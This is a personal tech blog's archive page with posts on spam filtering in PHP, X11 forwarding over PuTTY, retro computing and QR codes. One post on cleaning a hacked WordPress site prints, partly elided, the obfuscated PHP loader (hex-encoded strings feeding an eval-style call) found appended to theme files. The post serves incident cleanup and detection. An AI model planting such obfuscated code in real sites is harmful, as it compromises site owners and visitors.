Category Archives: Internet

Gibberish Last Names Clogging up Subscriptions

I had been annoyed recently by an increasing number of SPAM subscriptions on my web site. The script behind the form for these subscriptions and rebate requests immediately sends out a confirmation email to the address entered (as well as to the admin of the site) and adds the visitor to a database.

Initially there were a few of those spam entries and I could easily go into the database and manually remove them. But they became more and more numerous, so the first step was to add a link to the email the admin received which allowed for an easy removal of that spam entry.

But finally it got so annoying and time-consuming that I tried to think of a more automated way to handle the spam entries. What they all had in common was

  • a good first name
  • a gibberish last name like NLMAkPJpIVyqCkCeuEh, YijhgzswktJTVWqXhmA or MPSVPkfXInMzFYhEOpp
  • and a good email

The email was probably a good one, because there were hardly any bounces for the automatic confirmation emails. That also bothered me, because these poor recipients got some SPAM apparently coming from me.

Now the quest for me was to find something that all these spam entries had in common so that I could filter them somehow. Unfortunately, PHP does not have a ‘gibberish’ function, so I had to come up with one of my own. Meditating over these entries, I finally saw that these spam names often have longer sequences of consonants than would occur in valid names.

With a little bit of help from my friends at Google I came up with the following. In the hope that it might help somebody bothered by the same spammers, here is the code snippet to filter those entries:

$first = $_REQUEST['first'];
$last  = $_REQUEST['last'];
// four or more consonants in a row rarely occur in real names
$gibberish = preg_match('/[bcdfghjklmnpqrstvwxz]{4,}/i', $first)
          || preg_match('/[bcdfghjklmnpqrstvwxz]{4,}/i', $last);
if (! $gibberish) {
    // do the regular processing
} else {
    // pretend everything went fine for the spammer
    // but don't really do anything
}

We will see how many slip through: gibberish with fewer than four consonants in a row.
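The heuristic is easy to sanity-check from the command line before wiring it into PHP. Here is a quick sketch with grep, using the sample gibberish names from above plus ‘Miller’ as a made-up legitimate control:

```shell
# Count how many of these names trip the four-consonants-in-a-row test.
# (Same character class as the PHP regex; y is deliberately excluded so
# names with a vowel-like y, e.g. 'Myrtle', are not penalized.)
names='NLMAkPJpIVyqCkCeuEh
YijhgzswktJTVWqXhmA
MPSVPkfXInMzFYhEOpp
Miller'
echo "$names" | grep -icE '[bcdfghjklmnpqrstvwxz]{4,}'
```

All three gibberish samples match; the control name does not.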

What I am still curious about is ‘WHY’? What does the spammer intend with these spam entries? I don’t see any way this could be beneficial to him/her. Discrediting me because the site sends out spam? But why then use gibberish in the last name? I am really curious.

The Internet is Humming with Dr. Who

Today the wait was over – the second half of season 7 of Dr. Who has started.

I bet that most views of the show happened on the official channels like BBC America here in the US of A, but, as we are out in the boonies with cable left behind, we depended on the good old pirate bay to get our fix of Dr. Who (obviously this is a lie, as we would never download any TV show illegally). Had we actually looked at the torrents, we would have been surprised by all the buzz on the interconnected pipes that make up the internet. Well over 2000 seeders is rather rare, and still the download speed would have been – had we done that – rather slow, so there must have been many, many people just as excited to find out about the Doctor’s new adventures, all with a new companion.

Had we been able to watch the show after downloading it illegally we would have been able to actually watch it on the west coast before it officially aired. As I write this, it’s only a bit after the show ended and we would have finished it hours ago – way ahead of all the people waiting for the BBC to start it – Man – are time zones cool, or what?

I’m really curious whether the Doctor will get lucky with this companion, but I’m not really holding my breath, as one of the big tensions in the series is that it never happens. Strange things can happen if time travel is involved, like Amy turning out to be the Doctor’s mother-in-law – who comes up with those things?

Thanks, Steven Moffat!

The Hobby Kitchen – A Pre-Blog

This is history as we made it!

It was in the early days of the internet, a time when Google did not exist yet, when we used Alta Vista to find things on that interweb. When Netscape was strong and the driving force for new developments on this world wide web. When there were pages at Netscape where you could tell the world about new sites or pages – and the world came.

It was 1995!

This is when we started something that would later be called a blog. Sure, there was no PHP (at least on the web) and certainly no WordPress, so the blog entries had to be crafted by hand, usually in a simple text editor, and the blogger had to know HTML. Not that there was much to be known – the leading edge of HTML tags was background images and music.

This was the year ‘My Hobby Kitchen’ was born. The plan was to publish one Thai recipe every few days, or however often we managed. If we had kept it up, by now we would have – at one recipe per day – close to one thousand recipes. That number shows that it was just not possible, as nobody knows 1000 recipes. We did – maybe – foresee that and invented the ‘guest blogger.’ But only one came on board, shortly before the project died.

The amazing part of the story is that these pages survived. After a multitude of ISPs, and moving between different domains, these pages are still there and they are finding a new home now on this (real) blog.

I kept the pages as they were, just made some adjustments to fit into the framework of this blog, removed any pointers to websites that don’t exist anymore, and anonymized it to protect the guilty. But I left all the tacky background music (at least it does not start automatically) and images intact so that all those young people can see how it all started. It was written from the perspective of my significant other who is Thai and knew what she was doing – yours truly was just the webmaster.

Without any further ado, here is

My Hobby Kitchen.

X11Forwarding But DISPLAY variable not set

Serious programming in the olden days meant dealing with Unix – the father of today’s ubiquitous Linux, which runs the bigger part of the internet.

The first bigger project I was involved in was still the good old DOS with Turbo Pascal – anybody remember that?

As soon as I could, and we had to build something less of a hack but more of a software-engineered application, I steered my client into Unix, first the X86 version of Xenix, which turned out to be too flaky, and then a nice hundred thousand dollar HP Workstation. As it was an application involving graphics, an important order of business was to get familiar with the principles and techniques of the X11 windowing system.

This was not a very long-lived project, and with the advent of more powerful x86 hardware and a finally decent piece of software from Microsoft – Windows NT – the development was moved to that new platform. The fact that the port from X to NT was not terribly difficult was a nice testimonial for the proper application of software engineering principles. The hacking mentality promoted by something like Turbo Pascal would have required a complete rewrite.

The system administration I had become familiar with during that time was helpful when I started to maintain a few linux web servers years later. I always considered X11 far superior to all the other graphical windowing software, but I never really had anything to do with it anymore – until a few days ago.

First of all, I finally succeeded in getting Ubuntu running on an old laptop. A flaky DVD had never gotten me through an installation properly, and the machine was so old that it could not boot from a memory stick. I ultimately succeeded when I found a utility that I could burn to a CD; booting from that CD made the machine boot from the USB stick. Now I could install Ubuntu from the USB stick.

So, there I finally was again, with a computer with a proper graphical user interface. But that computer was tucked away somewhere with little physical access. It serves as a local testing machine for web development – I did not really need X Windows for that!

But it was sitting there, teasing me, so I finally got Xming – an X server running on MS Windows – installed on my main computer, where I sit all day, and I could finally connect to that old laptop remotely with a graphical user interface. In my early days of X11 there was not too much concern about security – it was all on the local network, yes, a coax ethernet cable. To have an application display on an X terminal, you just had to set the DISPLAY environment variable to the IP address of any X server, like an X terminal, and authorize its use.

That is all different now. Here is how it works today: I start an ssh connection from my workstation (Windows 7) to the remote host (the old linux laptop) using PuTTY. If the PuTTY session has X forwarding enabled, a secure tunnel for all the X traffic is created. This tunnel can even go through a router with NAT without a problem. Initially I had wondered why I saw the value of the DISPLAY variable set to strange things like localhost:10.0, but I finally understood that this is how the ssh tunnel works: the ssh server on the old laptop pretends to be a local X server on display number 10; it then transports all the X traffic it receives securely to the machine I am sitting on and feeds it into Xming. It all worked perfectly.
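The display-number arithmetic can be sketched in a few lines of shell. The value 10 is just what my sshd happened to pick, and the 6000+N rule is the standard X11 convention, not anything PuTTY-specific:

```shell
# sshd pretends to be local X display number 10; an X server for
# display N listens on TCP port 6000+N, so the tunnel endpoint is:
DISPLAY=localhost:10.0
disp=${DISPLAY#localhost:}   # strip the host part   -> "10.0"
disp=${disp%.*}              # strip the screen part -> "10"
echo $((6000 + disp))        # the port sshd listens on for X clients
```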

Two weeks later I received my first Raspberry Pi and that little wonder did behave the same way as the old laptop, a bit slower I have to admit, so the old laptop is still a bit more powerful than the miniature linux box sitting over there on my speaker. Both are full LAMP systems and are even accessible from the rest of the world through the magic of DynDNS and port forwarding.

But then my trouble began.

As I had all this so nicely and easily set up, it was suddenly not enough any more that I logged into my real web servers only with putty, SCP, and DirectAdmin. Nostalgia had me in its grip and I just had to get X running on them as well.

First of all there was no X-stuff installed on those servers as they were web servers in some remote data center. But a “yum install xterm” got this handled. Still no go – starting xterm from the ssh login gave me the error message that the display was either not there or could not be opened.

The next step, I found out, was to enable X11Forwarding for the sshd on the remote server – but still no go – the DISPLAY variable was still not set. Lots of Googling around but no solution – everything I tried made no difference.
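For reference, here is the server-side checklist as I understand it; file locations and commands are assumptions based on a stock CentOS-style box, so adjust for your distribution:

```shell
# 1) The sshd on the remote server must allow forwarding:
#       /etc/ssh/sshd_config  ->  X11Forwarding yes
# 2) Restart sshd so the change takes effect:
#       service sshd restart
# 3) The PuTTY session needs "Enable X11 forwarding" checked under
#    Connection -> SSH -> X11, otherwise DISPLAY will never be set.
```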

But I learned about the -vvv parameter to ssh. It would give me insight into what was happening while the ssh connection was being established. Unfortunately, PuTTY does not have it! But I found that PuTTY has a logging function, and after turning this on and comparing the logs from connections to my local old laptop and to the remote web server, I finally saw the light:


After I had xauth yum-installed and ran it once to generate a new .Xauthority file for a local X server, my quest for an xterm running on that web server and displaying on my local machine behind a NAT router in my office had come to a successful conclusion.
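Sketched from memory, the missing piece was the xauth utility: sshd needs it to write the magic cookie for the forwarded display into ~/.Xauthority, and a bare web server has no reason to ship it. The package name is an assumption and varies by distribution:

```shell
#   yum install xauth        # on some distros: xorg-x11-xauth
#
# Then log out and ssh back in with X forwarding enabled.  sshd can
# now create ~/.Xauthority, DISPLAY gets set, and xterm finds its
# display:
#   xauth list               # shows the cookie sshd added
#   echo $DISPLAY            # e.g. localhost:10.0
```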

Not that I will use that much – putty and SCP have done the job for me for years – but I now could, potentially, install firefox on that server and start browsing through that server located at a very different place on the planet.

Hmmm  – why don’t I just try that: yum install firefox……………………….
finally, after installing a gazillion dependent packages, the installation is – complete!

Now: firefox& – wait – wait – wait…


But it is clear that I have to file this away under ‘education’, as it is so slow as to be more or less unusable.

The Good Old Trash 80

I ran into a web site today showing the 1980s Radio Shack catalog featuring the TRS-80.

It made me feel sentimental as my very first computer had been a Trash-80 and I remember having a lot of fun with it. One of the most difficult tasks for me to understand, at that time, had been the idea of an interpreted language, like that TRS-80 Basic.

Before that computer, I had been mostly exposed to assembler and some high-level languages like Fortran and PL3 on an IBM mainframe. The idea of typing in human-readable code and directly running it – without compiling and linking – was a strange concept for me to grasp.

The TRS-80 I had was far less sophisticated than the one shown in the above catalog, so I looked around and found a picture that matched better what I remembered:

I believe that I had the 16kB model, but certainly no floppy disks – I saved my programs and data on cassette tape. Given my difficulty grasping the concept of interpreted languages, the first program I bought was an assembler. It was quite some work to get anything done with this setup:

  • Insert the cassette with the assembler and load the program
  • Edit and assemble the code, keeping source and assembled program in memory
  • Insert a new cassette into the recorder and save the source file
  • Insert a different cassette into the recorder and save the assembled program
  • Load the assembled program (overwriting the assembler in memory)
  • Run and test the assembled program, writing down errors
  • Rinse and repeat

This lengthy procedure trained you to really think ahead and consider all possible errors – it took too long to ‘just try’ something. In this regard, those interpreted languages are much easier and train programmers to be much sloppier.

The bigger part of the internet is now based on such sloppy work – whenever you have a PHP file, it is more or less interpreted like the old Basic in my Trash 80. I once read – and it made a lot of sense – that we would do a lot to mitigate global warming if we compiled all those billions of lines of PHP code into machine code once and then executed that on the server. All data centers around the world could be scaled down considerably if each line of PHP code did not have to be compiled over and over and over again, saving energy for the processors of the web servers and the energy for cooling them.

Maybe, then the web could run on a couple of TRS-80s.

Triumph of the Nerds

Now that all those nerds who created the computer revolution are getting to an age where we might lose them – see Steve Jobs – documentaries like Robert X. Cringely’s Triumph of the Nerds become more of a history text book (book understood figuratively).

In the old InfoWorld magazine/newspaper, Cringely’s column “Notes from the Field” was always my favorite – yours too, Max, right?

So, I just had to stop and listen (and watch) when I ran into his documentary “Triumph of the Nerds” on Youtube.

A Trojan of the name going to

This is only the second time that one of my sites was hacked – not bad for how long I have been doing this type of stuff.

It took me a while, amongst other things because the location of my server had changed due to a data-center consolidation. So it was not quite that easy to know why things were going wrong – was it the hack, or was it some configuration problem with the new IP?

But eventually everything turned out fine, and the site is working properly again. As I looked around the net quite a bit and did not find a good solution, I thought I would share it here in the hope that it might help another soul at some time.

The first indication was a report from a message board that it had deleted a link to the site in question because the site was distributing malware. I had not seen anything wrong, and my antivirus software had never told me anything, so my first reaction was to disregard it. But then I suddenly got a message from Avast that it had blocked a bad-bad URL. Now I knew something was wrong. The bad URL was a random subdomain on the top-level “” – but a grep over the site did not turn up anything about osa or .pl. Then I received another report from my VPS host that this was the trojan.

Not much luck on the net finding info on how that might look on infected web sites, so that I could start trusty old grep.

I looked a lot through the database dump for clues – I forgot to mention, this was a site with a WordPress blog used as CMS – no luck!

I ended up swapping out all the WP code and updating PHP to 5.3.8, because some of the info I had found about the trojan indicated that a vulnerability in the 5.2.17 I ran was at fault. Neither made a difference. I had disabled all plugins – that did not make a difference either – where else could it be?

Finally the good idea came, and I should have looked there first: a diff of the theme I was using against an installation that used the same theme finally gave a long list of differences in a few files – mostly index.php, header.php and footer.php – the code added to the end of these files was:

<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = “7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0Zupm
…and so on
= “\x65\144\x6f\154\x70\170\x65”;$eva1tYldakBcVSir = “\x73\164\x72\162\x65\166”;$eva1tYldakBoVS1r = “\x65\143\x61\154\x70\145\x72\137\x67\145\x72\160”;$eva1tYidokBoVSjr = “\x3b\51\x29\135\x31\133\x72\152\x53\126\x63\102\x6b\141\x64\151\x59\164\x31\141\x76\145\x24\50\x65\144\x6f\143\x65\144\x5f\64\x36\145\x73\141\x62\50\x6c\141\x76\145\x40\72\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b\72\x40\50\x2e\53\x29\100\x69\145”;$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);$eva1tYldakBc
VSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBc
VSjr[0.061*0.031]));$eva1tYldakBcVSir = “”;$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;$eva1tYldakBcVSir = “\x73\164\x72\x65\143\x72\160\164\x72”;$eva1tYlbakBcVSir = “\x67\141\x6f\133\x70\170\x65”;$eva1tYldakBoVS1r = “\x65\143\x72\160”;$eva1tYldakBcVSir = “”;$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>

Removing these lines from the end of the theme files did the job. Then I obviously changed all the file permissions so as not to allow apache to change those files any more.
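The detection step generalizes into a few shell commands. This is a toy reconstruction with made-up paths, not the actual site layout:

```shell
# Build a tiny stand-in for "pristine theme" vs "live theme with payload".
mkdir -p /tmp/theme-demo/clean /tmp/theme-demo/live
printf '<?php // real theme code ?>\n' > /tmp/theme-demo/clean/footer.php
cp /tmp/theme-demo/clean/footer.php /tmp/theme-demo/live/footer.php
printf '<?php @error_reporting(0); /* injected */ ?>\n' >> /tmp/theme-demo/live/footer.php

# diff against the known-good copy makes the injected code stick out:
diff -r /tmp/theme-demo/clean /tmp/theme-demo/live || true

# after cleaning up, take write permission away so apache cannot
# re-infect the files:
chmod -R a-w /tmp/theme-demo/live
```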

The last decree was to change the password of the owner of the site and to reduce him from an admin to an editor – and to tell him to scan his computer.

Now I just have to send him an email with his new password.

Hope this might help somebody sometime.

The How-to-Geek Blog

One of the few things that remain on my ‘look-at-every-time’ list of blogs is How-To Geek.

In their year-end cleaning, they revisited their Best How-To Geek Guides of 2011. The subjects covered are:

  1. The How-To Geek Guide to Getting Started with LastPass
  2. The How-To Geek Guide to XBMC Add-Ons
  3. The How-To Geek Guide to Making Your Own Custom Ethernet Cables
  4. The How-To Geek Guide to Getting Started with Usenet
  5. Hardware Upgrade: The HTG Guide to Picking the Right PC Monitor
  6. The Beginner’s Guide to Using QoS (Quality of Service) on Your Router
  7. How to Secure Your Wi-Fi Network Against Intrusion
  8. How to Use a Soldering Iron: A Beginner’s Guide
  9. How to Pick the Right Motherboard for Your Custom-Built PC
  10. The How-To Geek Video Guide to Using Windows 7 Speech Recognition
  11. The Beginner’s Guide to Shell Scripting
  12. The How-To Geek Guide to Hackintoshing
  13. The How-To Geek Guide to Audio Editing Using Audacity
  14. The How-To Geek Guide to Scoring Free Wi-Fi
  15. The How-To Geek Guide to 3D Monitors and TVs
  16. The How-To Geek Guide to Buying an HDTV

How come I read this blog and not the many others I am subscribed to?

The reason is simply that this is the only one I am subscribed to by email. I had, in the past, set up RSS feeds for all the other sites I wanted to keep up with in my Thunderbird and I read, or at least skimmed, them all on a daily basis.

Until it got too time-consuming and I decided to use Google Reader so that new posts did not interrupt my workflow. I transferred all the feeds to Google Reader and made a nice icon in my task bar for it – – – and that is where it remains, mostly unnoticed. Now, when I remember to check new blog posts, I have an overwhelming “>1000” to deal with. So, most of the time, I just select ‘set all as read’ and am done with it.

Conclusion – email still gets much more of my attention than RSS feeds in Reader.

Experiments in QR

Before there was NFC (near field communication), now built into the Nexus S, to read tags embedded in physical objects via electromagnetic radiation, there was another method of doing the same thing with light (just another electromagnetic wavelength). It did not catch on as much as I wished it had, because I think it’s darn cool, and it is so much cheaper to print a QR code on something than to buy NFC chips. Sure, the communication is one-way, but comparing the cost of printing a little square on a sticker with the current cost of NFC stickers (about a dollar), the choice for the occasional user seems clear.

But if we look at Google for guidance, it appears the QR code might be dead. They had started to promote QR codes heavily a while back with Google Local stickers (with a QR code) sent to local businesses, but that is now all over and Android appears to be heading – again heavily – into support for NFC.

Oh well – but you can play with QR codes nicely, and the error correction even allows you to mess with the codes to a degree.
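If you want to try this yourself, the open-source qrencode command line tool (an assumption on my part – any generator that lets you pick the error-correction level works the same way) makes it easy to create codes with maximum redundancy:

```shell
#   qrencode -l H -o vanity-qr.png 'http://example.com/'
#
# -l H requests the highest error-correction level: roughly 30% of the
# modules can be altered or painted over and the code still scans,
# which is exactly the headroom that vanity edits live off.
```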

I did just that and came up with this custom QR code. It is pointless for this article, because you are already on the site this code points to, but I had fun playing with it (the original code was generated by Raco Industries). And then I went wild with Photoshop and made my very own vanity QR code.

Take a look, get out your phone and see if it really works…